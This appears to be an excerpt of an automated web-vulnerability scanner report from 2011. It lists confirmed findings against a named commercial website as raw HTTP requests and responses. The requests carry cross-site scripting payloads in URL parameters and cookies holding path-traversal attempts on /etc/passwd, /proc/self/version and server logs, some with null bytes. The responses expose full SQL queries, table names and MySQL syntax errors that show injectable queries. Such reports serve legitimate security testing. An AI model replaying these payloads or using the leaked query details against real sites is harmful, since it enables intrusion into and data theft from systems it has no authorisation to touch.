OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:59 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=0dp23g65m51nvfjolvfuf8aaf6; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left 
join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>' OR prj.project_page_url = 'leadflow/phsy00/project.php?catId=110009&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x000575)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000575)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lgds00/

/ppc/leadflow/lgds00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lgds00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x00057D)</script>

Request

GET /ppc/leadflow/lgds00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057D)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lgds00/project.php?catId=80005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e3it0up695j6il1a9ajdp32so5; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>' OR prj.project_page_url = 'leadflow/lgds00/?nsextt='"--></style></script><script>netsparker(0x00057D)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x00057D)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x000579)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000579)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aingrt2q69pn376srfihef1v04; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='"--></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x000579)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=20001&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 20001
iusrc GET '"--></style></script><script>alert(0x00058E)</script>

Request

GET /ppc/leadflow/wede00/project.php?catId=20001&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00058E)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=hcsdo70qe0f48i3mpm0rhp1rg2; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


